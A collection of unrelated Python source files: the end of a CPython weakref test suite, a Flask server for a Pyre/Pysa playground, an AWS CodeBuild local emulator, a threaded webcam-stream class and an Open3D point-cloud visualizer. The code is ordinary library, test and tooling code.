self.assertFalse(k in dict)
with testcontext() as (k, v):
self.assertRaises(KeyError, dict.pop, k)
self.assertFalse(k in dict)
with testcontext() as (k, v):
dict[k] = v
self.assertEqual(dict[k], v)
ddict = copy.copy(dict)
with testcontext() as (k, v):
dict.update(ddict)
self.assertEqual(dict, ddict)
with testcontext() as (k, v):
dict.clear()
self.assertEqual(len(dict), 0)
def test_weak_keys_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_keyed_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'iterkeys')
self.check_weak_destroy_while_iterating(dict, objects, 'iteritems')
self.check_weak_destroy_while_iterating(dict, objects, 'itervalues')
self.check_weak_destroy_while_iterating(dict, objects, 'iterkeyrefs')
dict, objects = self.make_weak_keyed_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.iteritems())
next(it)
# Schedule a key/value for removal and recreate it
v = objects.pop().arg
gc.collect() # just in case
yield Object(v), v
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
def test_weak_values_destroy_while_iterating(self):
# Issue #7105: iterators shouldn't crash when a key is implicitly removed
dict, objects = self.make_weak_valued_dict()
self.check_weak_destroy_while_iterating(dict, objects, 'iterkeys')
self.check_weak_destroy_while_iterating(dict, objects, 'iteritems')
self.check_weak_destroy_while_iterating(dict, objects, 'itervalues')
self.check_weak_destroy_while_iterating(dict, objects, 'itervaluerefs')
dict, objects = self.make_weak_valued_dict()
@contextlib.contextmanager
def testcontext():
try:
it = iter(dict.iteritems())
next(it)
# Schedule a key/value for removal and recreate it
k = objects.pop().arg
gc.collect() # just in case
yield k, Object(k)
finally:
it = None # should commit all removals
gc.collect()
self.check_weak_destroy_and_mutate_while_iterating(dict, testcontext)
def test_make_weak_keyed_dict_from_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
self.assertEqual(dict[o], 364)
def test_make_weak_keyed_dict_from_weak_keyed_dict(self):
o = Object(3)
dict = weakref.WeakKeyDictionary({o:364})
dict2 = weakref.WeakKeyDictionary(dict)
self.assertEqual(dict[o], 364)
def make_weak_keyed_dict(self):
dict = weakref.WeakKeyDictionary()
objects = map(Object, range(self.COUNT))
for o in objects:
dict[o] = o.arg
return dict, objects
def test_make_weak_valued_dict_misc(self):
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.__init__)
self.assertRaises(TypeError, weakref.WeakValueDictionary, {}, {})
self.assertRaises(TypeError, weakref.WeakValueDictionary, (), ())
# special keyword arguments
o = Object(3)
for kw in 'self', 'other', 'iterable':
d = weakref.WeakValueDictionary(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def make_weak_valued_dict(self):
dict = weakref.WeakValueDictionary()
objects = map(Object, range(self.COUNT))
for o in objects:
dict[o.arg] = o
return dict, objects
def check_popitem(self, klass, key1, value1, key2, value2):
weakdict = klass()
weakdict[key1] = value1
weakdict[key2] = value2
self.assertEqual(len(weakdict), 2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 1)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
k, v = weakdict.popitem()
self.assertEqual(len(weakdict), 0)
if k is key1:
self.assertIs(v, value1)
else:
self.assertIs(v, value2)
def test_weak_valued_dict_popitem(self):
self.check_popitem(weakref.WeakValueDictionary,
"key1", C(), "key2", C())
def test_weak_keyed_dict_popitem(self):
self.check_popitem(weakref.WeakKeyDictionary,
C(), "value 1", C(), "value 2")
def check_setdefault(self, klass, key, value1, value2):
self.assertIsNot(value1, value2,
"invalid test"
" -- value parameters must be distinct objects")
weakdict = klass()
o = weakdict.setdefault(key, value1)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
o = weakdict.setdefault(key, value2)
self.assertIs(o, value1)
self.assertIn(key, weakdict)
self.assertIs(weakdict.get(key), value1)
self.assertIs(weakdict[key], value1)
def test_weak_valued_dict_setdefault(self):
self.check_setdefault(weakref.WeakValueDictionary,
"key", C(), C())
def test_weak_keyed_dict_setdefault(self):
self.check_setdefault(weakref.WeakKeyDictionary,
C(), "value 1", "value 2")
def check_update(self, klass, dict):
#
# This exercises d.update(), len(d), d.keys(), in d,
# d.get(), d[].
#
weakdict = klass()
weakdict.update(dict)
self.assertEqual(len(weakdict), len(dict))
for k in weakdict.keys():
self.assertIn(k, dict,
"mysterious new key appeared in weak dict")
v = dict.get(k)
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
for k in dict.keys():
self.assertIn(k, weakdict,
"original key disappeared in weak dict")
v = dict[k]
self.assertIs(v, weakdict[k])
self.assertIs(v, weakdict.get(k))
def test_weak_valued_dict_update(self):
self.check_update(weakref.WeakValueDictionary,
{1: C(), 'a': C(), C(): C()})
# errors
self.assertRaises(TypeError, weakref.WeakValueDictionary.update)
d = weakref.WeakValueDictionary()
self.assertRaises(TypeError, d.update, {}, {})
self.assertRaises(TypeError, d.update, (), ())
self.assertEqual(list(d.keys()), [])
# special keyword arguments
o = Object(3)
for kw in 'self', 'dict', 'other', 'iterable':
d = weakref.WeakValueDictionary()
d.update(**{kw: o})
self.assertEqual(list(d.keys()), [kw])
self.assertEqual(d[kw], o)
def test_weak_keyed_dict_update(self):
self.check_update(weakref.WeakKeyDictionary,
{C(): 1, C(): 2, C(): 3})
def test_weak_keyed_delitem(self):
d = weakref.WeakKeyDictionary()
o1 = Object('1')
o2 = Object('2')
d[o1] = 'something'
d[o2] = 'something'
self.assertEqual(len(d), 2)
del d[o1]
self.assertEqual(len(d), 1)
self.assertEqual(d.keys(), [o2])
def test_weak_valued_delitem(self):
d = weakref.WeakValueDictionary()
o1 = Object('1')
o2 = Object('2')
d['something'] = o1
d['something else'] = o2
self.assertEqual(len(d), 2)
del d['something']
self.assertEqual(len(d), 1)
self.assertEqual(d.items(), [('something else', o2)])
def test_weak_keyed_bad_delitem(self):
d = weakref.WeakKeyDictionary()
o = Object('1')
# An attempt to delete an object that isn't there should raise
# KeyError. It didn't before 2.3.
self.assertRaises(KeyError, d.__delitem__, o)
self.assertRaises(KeyError, d.__getitem__, o)
# If a key isn't of a weakly referencable type, __getitem__ and
# __setitem__ raise TypeError. __delitem__ should too.
self.assertRaises(TypeError, d.__delitem__, 13)
self.assertRaises(TypeError, d.__getitem__, 13)
self.assertRaises(TypeError, d.__setitem__, 13, 13)
def test_weak_keyed_cascading_deletes(self):
# SF bug 742860. For some reason, before 2.3 __delitem__ iterated
# over the keys via self.data.iterkeys(). If things vanished from
# the dict during this (or got added), that caused a RuntimeError.
d = weakref.WeakKeyDictionary()
mutate = False
class C(object):
def __init__(self, i):
self.value = i
def __hash__(self):
return hash(self.value)
def __eq__(self, other):
if mutate:
# Side effect that mutates the dict, by removing the
# last strong reference to a key.
del objs[-1]
return self.value == other.value
objs = [C(i) for i in range(4)]
for o in objs:
d[o] = o.value
del o # now the only strong references to keys are in objs
# Find the order in which iterkeys sees the keys.
objs = d.keys()
# Reverse it, so that the iteration implementation of __delitem__
# has to keep looping to find the first object we delete.
objs.reverse()
# Turn on mutation in C.__eq__. The first time thru the loop,
# under the iterkeys() business the first comparison will delete
# the last item iterkeys() would see, and that causes a
# RuntimeError: dictionary changed size during iteration
# when the iterkeys() loop goes around to try comparing the next
# key. After this was fixed, it just deletes the last object *our*
# "for o in obj" loop would have gotten to.
mutate = True
count = 0
for o in objs:
count += 1
del d[o]
self.assertEqual(len(d), 0)
self.assertEqual(count, 2)
def test_threaded_weak_valued_setdefault(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(50000):
x = d.setdefault(10, RefCycle())
self.assertIsNot(x, None) # we never put None in there!
del x
def test_threaded_weak_valued_pop(self):
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(50000):
d[10] = RefCycle()
x = d.pop(10, 10)
self.assertIsNot(x, None) # we never put None in there!
def test_threaded_weak_valued_consistency(self):
# Issue #28427: old keys should not remove new values from
# WeakValueDictionary when collecting from another thread.
d = weakref.WeakValueDictionary()
with collect_in_thread():
for i in range(200000):
o = RefCycle()
d[10] = o
# o is still alive, so the dict can't be empty
self.assertEqual(len(d), 1)
o = None # lose ref
from test import mapping_tests
class WeakValueDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakValueDictionary conforms to the mapping protocol"""
__ref = {"key1":Object(1), "key2":Object(2), "key3":Object(3)}
type2test = weakref.WeakValueDictionary
def _reference(self):
return self.__ref.copy()
class WeakKeyDictionaryTestCase(mapping_tests.BasicTestMappingProtocol):
"""Check that WeakKeyDictionary conforms to the mapping protocol"""
__ref = {Object("key1"):1, Object("key2"):2, Object("key3"):3}
type2test = weakref.WeakKeyDictionary
def _reference(self):
return self.__ref.copy()
libreftest = """ Doctest for examples in the library reference: weakref.rst
>>> import weakref
>>> class Dict(dict):
... pass
...
>>> obj = Dict(red=1, green=2, blue=3) # this object is weak referencable
>>> r = weakref.ref(obj)
>>> print r() is obj
True
>>> import weakref
>>> class Object:
... pass
...
>>> o = Object()
>>> r = weakref.ref(o)
>>> o2 = r()
>>> o is o2
True
>>> del o, o2
>>> print r()
None
>>> import weakref
>>> class ExtendedRef(weakref.ref):
... def __init__(self, ob, callback=None, **annotations):
... super(ExtendedRef, self).__init__(ob, callback)
... self.__counter = 0
... for k, v in annotations.iteritems():
... setattr(self, k, v)
... def __call__(self):
... '''Return a pair containing the referent and the number of
... times the reference has been called.
... '''
... ob = super(ExtendedRef, self).__call__()
... if ob is not None:
... self.__counter += 1
... ob = (ob, self.__counter)
... return ob
...
>>> class A: # not in docs from here, just testing the ExtendedRef
... pass
...
>>> a = A()
>>> r = ExtendedRef(a, foo=1, bar="baz")
>>> r.foo
1
>>> r.bar
'baz'
>>> r()[1]
1
>>> r()[1]
2
>>> r()[0] is a
True
>>> import weakref
>>> _id2obj_dict = weakref.WeakValueDictionary()
>>> def remember(obj):
... oid = id(obj)
... _id2obj_dict[oid] = obj
... return oid
...
>>> def id2obj(oid):
... return _id2obj_dict[oid]
...
>>> a = A() # from here, just testing
>>> a_id = remember(a)
>>> id2obj(a_id) is a
True
>>> del a
>>> try:
... id2obj(a_id)
... except KeyError:
... print 'OK'
... else:
... print 'WeakValueDictionary error'
OK
"""
__test__ = {'libreftest' : libreftest}
def test_main():
test_support.run_unittest(
ReferencesTestCase,
MappingTestCase,
WeakValueDictionaryTestCase,
WeakKeyDictionaryTestCase,
SubclassableWeakrefTestCase,
)
test_support.run_doctest(sys.modules[__name__])
if __name__ == "__main__":
test_main()
|
application.py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import json
import logging
import os
import subprocess
import tempfile
import threading
from pathlib import Path
from typing import IO, List
from flask import Flask, request, jsonify
from flask_cors import CORS
from flask_socketio import SocketIO, emit
logging.basicConfig(
format="%(asctime)s %(levelname)s %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.DEBUG,
)
LOG: logging.Logger = logging.getLogger(__name__)
CUSTOM_PYSA_MODEL_FILE: str = "custom.pysa"
WATCHMAN_CONFIG_FILE: str = ".watchmanconfig"
PYRE_CONFIG_FILE: str = ".pyre_configuration"
INPUT_FILE: str = "input.py"
def _consume(stream: IO[str]) -> str:
buffer: List[str] = []
def _consume() -> None:
while True:
line = stream.readline()
if line:
decoded = line.strip()
LOG.debug(decoded)
buffer.append(decoded)
else:
break
thread = threading.Thread(target=_consume)
thread.start()
thread.join()
return "\n".join(buffer)
class Pyre:
def __init__(self) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Starting server in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
LOG.debug("Writing watchman configuration")
watchman_configuration_path = self._directory / WATCHMAN_CONFIG_FILE
watchman_configuration_path.write_text("{}\n")
LOG.debug("Starting watchman")
subprocess.check_call(["watchman", "watch", str(self._directory)])
LOG.debug("Priming the server")
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
subprocess.check_call(
["pyre", "--noninteractive", "check"], cwd=self._directory
)
def check(self, input: str) -> str:
LOG.debug("Running pyre check")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
# TODO(T82114844): incremental is borked on Ubuntu 20.04.
with subprocess.Popen(
["pyre", "--output=json", "--noninteractive", "check"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stderr = _consume(process.stderr)
# pyre-fixme[6]: Expected `IO[bytes]` for 1st param but got
# `Optional[IO[typing.Any]]`.
stdout = _consume(process.stdout)
return_code = process.wait()
if return_code > 1:
LOG.error(f"Returning error: {stderr}")
result = jsonify(errors=[stderr])
else:
errors = json.loads(stdout)
result = jsonify(data={"errors": errors, "stderr": stderr})
return result
class Pysa:
def __init__(
self, input: str, model: str = "", use_builtin_pysa_models: bool = False
) -> None:
self._directory: Path = Path(tempfile.mkdtemp())
self._stubs: Path = Path(tempfile.mkdtemp())
LOG.debug(f"Intializing Pysa in `{self._directory}`...")
pyre_configuration = json.dumps(
{
"source_directories": ["."],
"taint_models_path": [
str(self._stubs),
os.environ["PYSA_PLAYGROUND_TAINT_MODELS"],
]
if use_builtin_pysa_models
else str(self._stubs),
"search_path": [str(self._stubs), os.environ["PYSA_PLAYGROUND_STUBS"]],
}
)
LOG.debug(f"Writing configuration:\n{pyre_configuration}")
pyre_configuration_path = self._directory / PYRE_CONFIG_FILE
pyre_configuration_path.write_text(pyre_configuration)
if model:
LOG.debug("Writing custom model to pysa file")
model_path = self._stubs / CUSTOM_PYSA_MODEL_FILE
model_path.write_text(model)
LOG.debug(f"Writing code:\n{input}")
code_path = self._directory / INPUT_FILE
code_path.write_text(input)
def analyze(self) -> None:
LOG.debug("Running pysa")
with subprocess.Popen(
["pyre", "-n", "analyze"],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
cwd=self._directory,
text=True,
) as process:
model_verification_errors = []
for line in iter(process.stderr.readline, b""):
line = line.rstrip()
if line == "":
break
elif "ERROR" in line and "is not part of the environment" in line:
model_verification_errors.append(line)
elif "INFO" in line or "ERROR" in line:
if model_verification_errors:
# Emit all model verification lines together to prevent
# network overhead.
model_verification_error_output = "\n".join(
model_verification_errors
)
emit(
"pysa_results_channel",
{
"type": "output",
"line": model_verification_error_output,
},
)
LOG.debug(model_verification_error_output)
model_verification_errors = []
emit("pysa_results_channel", {"type": "output", "line": line})
LOG.debug(line)
return_code = process.wait()
if return_code != 0:
result = {"type": "finished", "result": "error"}
else:
result = {"type": "finished", "result": "ok"}
emit("pysa_results_channel", result)
application = Flask(__name__)
# You may need to modify the origin to the pyre-check website
# before deployment.
CORS(application)
socketio = SocketIO(application, cors_allowed_origins="*")
@application.route("/check", methods=["GET", "POST"])
def check() -> str:
input = (
request.args.get("input")
or request.form.get("input")
or request.json.get("input")
)
if input is None:
return jsonify(errors=["Input not provided"])
LOG.info(f"Checking `{input}`...")
pyre = Pyre()
return pyre.check(input)
@socketio.on("analyze", namespace="/analyze")
def analyze(json) -> None:
input = json.get("input", None)
use_builtin_pysa_models = json.get("use_builtin_pysa_models", False)
model = json.get("model", "")
if input is None:
emit(
"pysa_results_channel",
{
"type": "finished",
"result": "error",
"reason": "No code given to analyze.",
},
)
else:
pysa = Pysa(input, model, use_builtin_pysa_models)
LOG.info(f"Checking `{input}`...")
pysa.analyze()
@application.route("/")
def index() -> str:
return "404"
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--debug", action="store_true")
arguments: argparse.Namespace = parser.parse_args()
socketio.run(application, debug=arguments.debug)
|
codebuild_emulator.py |
import os
from os.path import join
import tempfile
import shutil
import json
import boto3
import docker
import time
import threading
import sys
cwd = os.getcwd()
target = join(cwd, 'artifacts')
default_script_path = join(os.path.dirname(os.path.realpath(__file__)), 'codebuild_builder.py')
class CodebuildEmulator:
def __init__(self,
docker_version,
codebuild_client=boto3.client('codebuild'),
sts_client=boto3.client('sts'),
assume_role=True,
debug=False,
override={},
pull_image=False):
self._docker_version = docker_version
self._codebuild_client = codebuild_client
self._sts_client = sts_client
self._assume_role = assume_role
self._debug = debug
self._override = override
self._pull_image = pull_image
def _get_project(self, project_name):
response = self._codebuild_client.batch_get_projects(names=[project_name])
projects = response['projects']
if projects:
return projects[0]
else:
raise Exception("No project found")
def run(self, configuration, input_src=cwd, target_dir=target):
project = self._get_project(configuration['ProjectName'])
work_dir = tempfile.mkdtemp()
run = CodebuildRun(project, input_src, work_dir,
self._sts_client, self._docker_version,
assume_role=self._assume_role,
debug=self._debug,
override=self._override,
pull_image=self._pull_image)
run.assume_role()
run.prepare_dirs()
run.run_container()
exit_code = run.wait_for_container()
run.copy_artifacts(target_dir)
shutil.rmtree(work_dir, ignore_errors=True)
return exit_code
class CodebuildRun:
def __init__(self,
project,
input_src,
work_dir,
sts_client=boto3.client('sts'),
docker_version='auto',
assume_role=True,
debug=False,
override={},
pull_image=False):
self._project = project
self._input_src = input_src
self._work_dir = work_dir
self._sts_client = sts_client
self._docker_version = docker_version
self._assume_role = assume_role
self._debug = debug
self._override = override
self._pull_image = pull_image
def assume_role(self):
if self._assume_role:
service_role = self._project['serviceRole']
assume = self._sts_client.assume_role(RoleArn=service_role,
RoleSessionName='codebuild-emulator')
self._access_key_id = assume['Credentials']['AccessKeyId']
self._secret_access_key = assume['Credentials']['SecretAccessKey']
self._session_token = assume['Credentials']['SessionToken']
else:
creds = boto3.Session().get_credentials()
self._access_key_id = creds.access_key
self._secret_access_key = creds.secret_key
self._session_token = creds.token
self._region_name = boto3.Session().region_name
def prepare_dirs(self):
readonly = join(self._work_dir, 'codebuild', 'readonly')
os.makedirs(readonly)
self._readonly_dir = readonly
bin = join(readonly, 'bin')
os.mkdir(bin)
executor_path = join(bin, 'executor')
shutil.copy2(default_script_path, executor_path)
os.chmod(executor_path, 500)
src = join(readonly, 'src')
shutil.copytree(self._input_src, src)
with open(join(readonly, 'variables.json'), 'w') as varsfile:
vars = self._get_env_vars()
json.dump(vars, varsfile)
buildspec = self._get_buildspec()
buildspec_dest = join(readonly, 'buildspec.yml')
if buildspec.startswith('version: '):
with open(buildspec_dest, 'w') as buildspecfile:
buildspecfile.write(buildspec)
else:
buildspec_src = join(src, buildspec)
if os.path.exists(buildspec_src):
shutil.copy2(buildspec_src, buildspec_dest)
else:
raise Exception("No buildspec provided")
output_dir = join(self._work_dir, 'codebuild', 'output')
os.mkdir(output_dir)
self._output_dir = output_dir
self._debug_file = join(output_dir, 'debug')
if self._debug:
open(self._debug_file, 'a').close()
def run_container(self):
image = self._project['environment']['image']
volumes = {self._readonly_dir: {'bind': '/codebuild/readonly', 'mode': 'ro'},
self._output_dir: {'bind': '/codebuild/output', 'mode': 'rw'}}
command = '/codebuild/readonly/bin/executor'
environment = {'AWS_ACCESS_KEY_ID': self._access_key_id,
'AWS_SECRET_ACCESS_KEY': self._secret_access_key,
'AWS_SESSION_TOKEN': self._session_token,
'AWS_DEFAULT_REGION': self._region_name,
'CBEMU_UID': os.getuid(),
'CBEMU_GID': os.getgid()}
privileged_mode = self._project['environment']['privilegedMode'] or image.startswith('aws/codebuild/docker')
docker_client = docker.from_env(version=self._docker_version)
if self._pull_image:
print('Pulling %s' % image)
docker_client.images.pull(name=image)
container = docker_client.containers.run(image=image,
volumes=volumes,
command=command,
environment=environment,
privileged=privileged_mode,
tty=True,
detach=True)
self._container = container
def wait_for_container(self):
if self._debug:
run_thread = threading.Thread(target=self._wait_for_input)
run_thread.daemon = True
run_thread.start()
while True:
stream = self._container.logs(stdout=True, stderr=True, stream=True, follow=True)
try:
for c in stream:
sys.stdout.write(c)
sys.stdout.flush()
if c == '\n':
sys.stdout.write('[Container] ')
sys.stdout.flush()
break
except Exception as e:
print('\n' + '=' * 128)
print(str(e))
print('\n' + '=' * 128)
if self._debug:
run_thread.join(timeout=10)
self._container.reload()
while not self._container.status == 'exited':
time.sleep(1)
docker_api = docker.APIClient(version=self._docker_version)
exit_code = docker_api.inspect_container(self._container.id)['State']['ExitCode']
return exit_code
def copy_artifacts(self, artifacts_target_dir):
artifacts_source_dir = join(self._output_dir, 'artifacts')
if os.path.exists(artifacts_source_dir):
print("Artifacts are copied into " + artifacts_target_dir)
shutil.rmtree(artifacts_target_dir, ignore_errors=True)
shutil.copytree(artifacts_source_dir, artifacts_target_dir)
def _get_buildspec(self):
if 'buildspec' in self._project['source']:
buildspec_raw = self._project['source']['buildspec'].strip()
return str(buildspec_raw)
else:
return 'buildspec.yml'
def _get_env_vars(self):
raw_environment = self._project['environment']['environmentVariables']
environment = {}
for tuple in raw_environment:
key = tuple['name']
value = tuple['value']
environment[key] = value
for env,val in self._override.iteritems():
print('Overriding %s with %s' % (env,val))
environment[env] = val
return environment
def _wait_for_input(self):
while True:
while not os.path.exists(self._debug_file):
time.sleep(1)
time.sleep(1)
value = raw_input('')
if value == 'S':
open(join(self._output_dir, 'skip'), 'a').close()
os.unlink(self._debug_file)
|
livestream.py | # _____ ______ _____
# / ____/ /\ | ____ | __ \
# | | / \ | |__ | |__) | Caer - Modern Computer Vision
# | | / /\ \ | __| | _ / Languages: Python, C, C++
# | |___ / ____ \ | |____ | | \ \ http://github.com/jasmcaus/caer
# \_____\/_/ \_ \______ |_| \_\
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2020-2021 The Caer Authors <http://github.com/jasmcaus>
#pylint:disable=no-member,pointless-string-statement
from threading import Thread
import math
import cv2 as cv
from .constants import FPS
__all__ = [
'LiveStream'
]
"""
Python threading has a specific meaning for daemon. A daemon thread will shut down immediately when the program exits. One way to think about these definitions is to consider the daemon thread a thread that runs in the background without worrying about shutting it down.
If a program is running Threads that are not daemons, then the program will wait for those threads to complete before it terminates. Threads that are daemons, however, are just killed wherever they are when the program is exiting.
"""
# This class can only handle live video streams. When applied on pre-existing videos, there appears to # be an issue with Threading. As a result, the video plays through with a high (almost x4) speed
# This issue has been marked and will be fixed in a future update.
class LiveStream:
r"""
This is an auxiliary class that enables Live Video Streaming for caer with minimalistic latency, and at the expense
of little to no additional computational requirements.
The basic idea behind it is to tracks and save the salient feature array for the given number of frames and then uses these anchor point to cancel out all perturbations relative to it for the incoming frames in the queue. This class relies heavily on **Threaded Queue mode** for error-free & ultra-fast frame handling.
Args:
source (int): Source path for the video. If ``source=0``, the default camera device is used. For
multiple external camera devices, use incremented values. For eg: ``source=1`` represents the second camera device on your system.
"""
def __init__(self, source=0):
r"""
Source must either be an integer (0, 1, 2 etc) or a path to a video file
"""
if isinstance(source, str):
raise ValueError('Expected an integer. Got a filepath. LiveVideoStream is for live streams only')
# Initializing the video stream
self.stream = cv.VideoCapture(source)
print('Live yes')
self.ret, self.frame = self.stream.read()
print('Live not')
self.width = int(self.stream.get(cv.CAP_PROP_FRAME_WIDTH))
self.height = int(self.stream.get(cv.CAP_PROP_FRAME_HEIGHT))
self.res = (self.width, self.height)
self.fps = math.ceil(self.stream.get(FPS))
# Initializing the thread name
self.thread_name = 'DefaultVideoStream'
# Boolean to check whether stream should be killed
self.kill_stream = False
def begin_stream(self):
# Starting the thread to read frames from the video stream
thread = Thread(target=self.update, name=self.thread_name, args=())
thread.daemon = True
thread.start()
return self
def read(self):
return self.frame
def update(self):
while not self.kill_stream:
self.ret, self.frame = self.stream.read()
def release(self):
# Stops the stream
# Releases video pointer
self.kill_stream = True
# Counting frames not applicable for live video
# # Gets frame count
# def count_frames(self):
# if not self.kill_stream:
# if get_opencv_version() == '2':
# return int(self.stream.get(FRAME_COUNT_DEPR))
# else:
# return int(self.stream.get(FRAME_COUNT))
# Gets FPS count
def get_fps(self):
if not self.kill_stream:
return self.fps
# if get_opencv_version() == '2':
# return math.ceil(self.stream.get(FPS_DEPR))
# else:
# return math.ceil(self.stream.get(FPS))
# Get frame dimensions
def get_res(self):
return self.res |
open3d_utils.py | # global
import ivy
import threading
import numpy as np
import open3d as o3d
# noinspection PyCallByClass
class Visualizer:
def __init__(self, cam_ext_mat=None):
# visualizer
self._vis = o3d.visualization.Visualizer()
self._vis.create_window()
# visualizer control
self._ctr = self._vis.get_view_control()
self._cam_ext_mat = cam_ext_mat
self._first_pass = True
self._cam_pose_initialized = True if cam_ext_mat is None else False
# Private #
def _wait_for_enter(self):
input('press enter to continue...')
self._pressend_enter = True
def _listen_for_enter_in_thread(self):
self._pressend_enter = False
self._thread = threading.Thread(target=self._wait_for_enter)
self._thread.start()
def _join_enter_listener_thread(self):
self._thread.join()
# Public #
def show_point_cloud(self, xyz_data, rgb_data, interactive, sphere_inv_ext_mats=None, sphere_radii=None):
if not interactive:
return
vectors = o3d.utility.Vector3dVector(np.reshape(ivy.to_numpy(xyz_data), (-1, 3)))
color_vectors = o3d.utility.Vector3dVector(np.reshape(ivy.to_numpy(rgb_data), (-1, 3)))
sphere_inv_ext_mats = list() if sphere_inv_ext_mats is None else sphere_inv_ext_mats
sphere_radii = list() if sphere_radii is None else sphere_radii
if self._first_pass:
# create point cloud
self._point_cloud = o3d.geometry.PointCloud(vectors)
self._point_cloud.colors = color_vectors
self._vis.clear_geometries()
self._vis.add_geometry(o3d.geometry.TriangleMesh.create_coordinate_frame(0.15, [0., 0., 0.]), True)
self._vis.add_geometry(self._point_cloud, True)
# spheres
self._spheres = list()
for sphere_inv_ext_mat, sphere_rad in zip(sphere_inv_ext_mats, sphere_radii):
sphere = o3d.geometry.TriangleMesh.create_sphere(sphere_rad)
sphere.paint_uniform_color(np.array([[0.], [0.], [0.]]))
sphere.transform(sphere_inv_ext_mat)
self._spheres.append(sphere)
self._vis.add_geometry(sphere, True)
else:
# update point cloud
self._point_cloud.points = vectors
self._point_cloud.colors = color_vectors
self._vis.update_geometry(self._point_cloud)
for sphere, sphere_inv_ext_mat in zip(self._spheres, sphere_inv_ext_mats):
sphere.transform(sphere_inv_ext_mat)
self._vis.update_geometry(sphere)
# camera matrix
if not self._cam_pose_initialized:
cam_params = o3d.camera.PinholeCameraParameters()
cam_params.extrinsic = self._cam_ext_mat
cam_params.intrinsic = self._ctr.convert_to_pinhole_camera_parameters().intrinsic
self._ctr.convert_from_pinhole_camera_parameters(cam_params)
self._cam_pose_initialized = True
# update flag
self._first_pass = False
# spin visualizer until key-pressed
self._listen_for_enter_in_thread()
while not self._pressend_enter:
self._vis.poll_events()
self._join_enter_listener_thread()
# reset spheres to origin
for sphere, sphere_inv_ext_mat in zip(self._spheres, sphere_inv_ext_mats):
sphere.transform(np.linalg.inv(sphere_inv_ext_mat))
# noinspection PyArgumentList
def show_voxel_grid(self, voxels, interactive, cuboid_inv_ext_mats=None, cuboid_dims=None):
if not interactive:
return
cuboid_inv_ext_mats = list() if cuboid_inv_ext_mats is None else cuboid_inv_ext_mats
cuboid_dims = list() if cuboid_dims is None else cuboid_dims
voxel_grid_data = ivy.to_numpy(voxels[0])
res = ivy.to_numpy(voxels[2])
bb_mins = ivy.to_numpy(voxels[3])
rgb_grid = voxel_grid_data[..., 3:6]
occupancy_grid = voxel_grid_data[..., -1:]
boxes = list()
for x, (x_slice, x_col_slice) in enumerate(zip(occupancy_grid, rgb_grid)):
for y, (y_slice, y_col_slice) in enumerate(zip(x_slice, x_col_slice)):
for z, (z_slice, z_col_slice) in enumerate(zip(y_slice, y_col_slice)):
if z_slice[0] > 0:
box = o3d.geometry.TriangleMesh.create_box(res[0], res[1], res[2])
box.vertex_colors = o3d.utility.Vector3dVector(np.ones((8, 3)) * z_col_slice)
xtrue = bb_mins[0] + res[0]*x
ytrue = bb_mins[1] + res[1]*y
ztrue = bb_mins[2] + res[2]*z
box.translate(np.array([xtrue, ytrue, ztrue]) - res/2)
boxes.append(box)
all_vertices = np.concatenate([np.asarray(box.vertices) for box in boxes], 0)
all_vertex_colors = np.concatenate([np.asarray(box.vertex_colors) for box in boxes], 0)
all_triangles = np.concatenate([np.asarray(box.triangles) + i*8 for i, box in enumerate(boxes)], 0)
final_mesh = o3d.geometry.TriangleMesh(o3d.utility.Vector3dVector(all_vertices),
o3d.utility.Vector3iVector(all_triangles))
final_mesh.vertex_colors = o3d.utility.Vector3dVector(all_vertex_colors)
# add to visualizer
self._vis.clear_geometries()
self._vis.add_geometry(o3d.geometry.TriangleMesh.create_coordinate_frame(0.15, [0., 0., 0.]), self._first_pass)
self._vis.add_geometry(final_mesh, self._first_pass)
# cuboids
self._cuboids = list()
for cuboid_inv_ext_mat, cuboid_dim in zip(cuboid_inv_ext_mats, cuboid_dims):
cuboid = o3d.geometry.TriangleMesh.create_box(cuboid_dim[0], cuboid_dim[1], cuboid_dim[2])
cuboid.translate(-cuboid_dim/2)
cuboid.paint_uniform_color(np.array([[0.], [0.], [0.]]))
cuboid.transform(cuboid_inv_ext_mat)
self._cuboids.append(cuboid)
self._vis.add_geometry(cuboid, self._first_pass)
# camera matrix
if not self._cam_pose_initialized:
cam_params = o3d.camera.PinholeCameraParameters()
cam_params.extrinsic = self._cam_ext_mat
cam_params.intrinsic = self._ctr.convert_to_pinhole_camera_parameters().intrinsic
self._ctr.convert_from_pinhole_camera_parameters(cam_params)
self._cam_pose_initialized = True
# update flag
self._first_pass = False
# spin visualizer until key-pressed
self._listen_for_enter_in_thread()
while not self._pressend_enter:
self._vis.poll_events()
self._join_enter_listener_thread()
|
